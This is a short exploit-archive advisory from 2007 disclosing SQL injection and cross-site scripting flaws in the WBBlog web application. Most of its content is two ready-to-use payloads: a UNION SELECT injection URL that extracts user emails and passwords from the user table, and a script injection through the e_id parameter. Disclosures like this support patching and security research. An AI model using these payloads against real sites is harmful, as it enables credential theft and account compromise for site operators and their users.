WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WBBlog (XSS/SQL) Multiple Remote Vulnerabilities
# Published : 2007-03-15
# Author : xoron
# Previous Title : Creative Guestbook 1.0 Multiple Remote Vulnerabilities
# Next Title : WebCalendar 0.9.45 (includedir) Remote File Inclusion Vulnerability

======================x=o=r=o=n=====================

WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

======================x=o=r=o=n=====================

Bulan: xoron

xoron.biz

======================x=o=r=o=n=====================

SQL INJ:

index.php?cmd=viewentry&e_id=-1/**/UNION/**/SELECT/**/null,null,u_email,null,u_password,null/**/FROM/**/user/*

XSS :

index.php?cmd=viewentry&e_id="><script>alert('HACKED')</script>

======================x=o=r=o=n=====================

Vendor Site: http://liqua.com/wbblog.html

======================x=o=r=o=n=====================

Thnx: pang0

======================x=o=r=o=n=====================

# www.Syue.com [2007-03-15]